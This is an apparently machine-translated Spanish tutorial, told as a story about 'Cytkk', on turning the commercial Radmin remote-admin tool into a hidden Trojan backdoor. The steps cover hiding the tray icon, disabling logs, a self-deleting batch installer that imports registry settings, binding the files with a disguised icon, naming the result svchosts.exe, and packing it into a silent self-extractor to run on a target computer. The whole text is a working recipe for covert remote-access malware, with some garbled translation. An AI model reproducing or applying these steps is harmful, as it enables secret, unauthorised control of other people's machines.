Tutorial de configuración para Radmin Shadow Edition 3.2

Dado que Radmin tiene la apariencia de un software comercial, ¡naturalmente el software antivirus no tendrá problemas! Sin embargo, aunque Radmin no se comprobará ni eliminará, tiene deficiencias inherentes: después de ejecutar el servidor, se muestra un icono en la barra de tareas y el servidor consta de 3 archivos (1 archivo EXE, 2 archivos DLL), lo que requiere manual. mano de obra Solo cuando ingresa la contraseña en el servidor puede conectarse y controlarlo normalmente, y lo más problemático es que el servidor no tiene una función de inicio automático.

Pensando en esto, Cytkk frunció levemente el ceño, pero con años de perspicacia técnica, apareció en su mente la imagen de un servidor Radmin modificado, una puerta trasera troyana perfecta: el servidor consta de un único archivo EXE. Complete la información de registro en el registro sin intervención manual y agréguelo a los elementos de inicio del servicio del sistema sin rastros obvios después de ejecutarlo. Cytkk movió el mouse al "" de su computadora mientras pensaba en ello.

Modificar Radmin

1.Cytkk decidió eliminar primero el logotipo de la barra de tareas después de ejecutar Radmin en el servidor. Ingrese "Configuración de parámetros" en "Configuración del servidor" de Radmin (consulte la Figura 1) y coloque un √ delante de "Ocultar icono de la barra de estado". Esto eliminará el inconveniente de tener un icono en la barra de estado después de ejecutarse en el servidor.

2. Luego cambie el número del puerto de conexión según sus propias necesidades y configúrelo en el puerto poco común 1986. Puede dejarlo sin cambios en otros lugares (vale la pena señalar la opción "Registro", no deje "evidencia" seleccionando por error "Mantener archivo de registro"), haga clic en "Aceptar" para salir.

3. Haga clic en "Establecer contraseña" para establecer la contraseña de conexión ******.

4. Después de configurar todo, Cytkk primero instaló el servicio en su propia máquina (debido a la particularidad del principio de funcionamiento de Radmin, la información de configuración no se registra en el programa del servidor, sino en el registro correspondiente claves dentro del valor).

Después de que el software le indique que el servicio se ha instalado correctamente, Cytkk abre el editor de registro, busca: valor de clave HKEY_LOCAL_MACHINE\SYSTEM\RAdmin, hace clic en "Exportar registro" y lo guarda como un archivo r_server.reg separado. Después de abrirlo con el Bloc de notas, el contenido se encuentra de la siguiente manera (los parámetros variarán ligeramente según la configuración):

Editor del Registro de Windows versión 5.00

[HKEY_LOCAL_MACHINE\SYSTE

M\ RAdmin]

[HKEY_LOCAL_MACHINE\SYSTE

M\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTE

M\RAdmin\ v2.0\ Servidor]

[HKEY_LOCAL_MACHINE\SYSTE

M\RAdmin\v2.0\Server\iplist]

[HKEY_LOCAL_MACHINE\SYSTE

M\RAdmin\v2.0\Server\Parameters]

"NTAuthEnabled"=hex:00,00,00,00

"Parameter"=hex:9c ,ee,06 ,f2,9b,05,13,f8,6e,66,9a,06,00,24,5b,4b (¡Esta es la contraseña de conexión! Otra información no afecta la operación, por lo que no es necesaria a dominar)

"Port"=hex:c2,07,00,00 (el puerto utilizado para conectarse al servidor)

"Timeout"=hex:0a,00 ,00,00

* *************************

"LogFilePath"="c :\\logfile.txt"

"FilterIp"=hex:00,00,00,00

"DisableTrayIcon"=hex:01,00,00,00 (01 significa ocultando el ícono en la esquina inferior derecha del sistema. Si se cambia al ícono 00, se mostrará)

"AutoAllow"=hex:00,00,00,00

"EnableEventLog"=hex:00,00,00,00

5. Finalmente, Cytkk creó rápidamente un nuevo archivo por lotes setup.bat en el escritorio y le agregué el siguiente script:

@echo off

****************** ******? (Instala automáticamente el servidor Radmin)

regedit .exe -s %SystemRoot%\system32\r_server.reg >nul (importa automáticamente la información de configuración en r_server.reg a la máquina de destino) registro)

net start r_server >nul (iniciar el servicio del servidor r_server)

************************ ******** (eliminar archivo de información)

del %0

Nota: El contenido entre paréntesis después del código en el texto es un comentario, no lo ingrese .

Super Bundle

Dado que Radmin no es un software de monitoreo "caballo de Troya", su servidor se compone de tres archivos: r_server.exe, raddrv.dll y AdmDll.dll. El servidor general "caballo de Troya" normalmente sólo tiene un archivo ejecutable. Este es un defecto más problemático, pero no molesta a Cytkk. Ejecuta hábilmente un software llamado "Super Bundling".

1. Haga clic en el icono blanco en el lado derecho de la interfaz, agregue los tres archivos del servidor Radmin a la lista de archivos, configure el método de agrupación en "Agrupación por archivo" y luego haga clic en " Botón "Avanzado" a la derecha para ingresar a la configuración detallada, en la opción "General" (Figura 2), personalice el ícono como un archivo de texto para aumentar una mejor ocultación y use el tamaño de archivo predeterminado.

2. Posteriormente, Cytkk seleccionó los tres elementos de "Sólo lectura", "Oculto" y "Sistema" en "Propiedades", haciendo así que los archivos empaquetados sean más ocultos y seguros.

3. Cytkk hace clic en la pestaña "Ejecutar" y aparece la configuración de ejecución del programa incluido. Configure el directorio de ejecución y descomposición del archivo en "Ejecutar en el directorio donde se encuentran los archivos empaquetados" y establezca el estado de la ventana en "Ocultar ventana".

4. Canceló el √ delante de todas las opciones de personalización en la página "Parámetros". Haga clic en "Aceptar" para regresar a la ventana de nivel superior y finalmente configure la ruta de salida del archivo del paquete. Para mejorar la ocultación, puede cambiar el nombre del archivo ejecutable incluido, Cytkk, a svchosts.exe.

5. Haga clic en "Fusionar" para completar el trabajo de agrupación de archivos en el lado del servidor. El Radmin actual básicamente ha pasado de ser un software comercial de control remoto a un auténtico caballo de Troya.

Consecuencias

En este punto, Cytkk cree que todo el trabajo de transformación está casi completado e inmediatamente llevará a cabo el trabajo de acabado clave, incluido el setup.bat editado y el primero exportado. r_server.reg. Los tres archivos svchosts.exe incluidos están empaquetados en un programa autoextraíble que utiliza WinRAR.

Cytkk ha realizado las siguientes configuraciones: En la opción "General" en "Opciones avanzadas de autolanzamiento", complete "%systemroot%\system32" en la columna de ruta de lanzamiento y en "Ejecutar después del lanzamiento". "Debe ingresar Write setup.bat (preste atención a la extensión del archivo), para que el programa por lotes se ejecute automáticamente después de la descompresión (Figura 3). En la opción "Modo", configure el primer modo en "Ocultar todo". Configure el modo de sobrescritura en "Omitir archivos existentes" y, finalmente, configure el "Módulo de liberación automática" en el formato de liberación automática RAR de la línea de comandos de DOS de DOS.SFX (porque la consola gráfica predeterminada de Windows no puede funcionar correctamente después de obtener el sistema. CMD Shell). Haga clic en "Aceptar" para completar el trabajo final. Cytkk finalmente revisó los comentarios en el paquete de autolanzamiento RAR (en la ventana gris a la derecha) y vio el script autoextraíble de la siguiente manera:

Ruta=%systemroot%\system32

****************

Silencio=1

Sobrescribir =2

Todo el trabajo se ha completado, Cytkk sonrió con satisfacción, cargó el programa empaquetado en la computadora de destino para ejecutarlo, luego abrió el cliente Radmin en su propia máquina, ingresó la IP de la máquina de destino → Conectar → Entrar la contraseña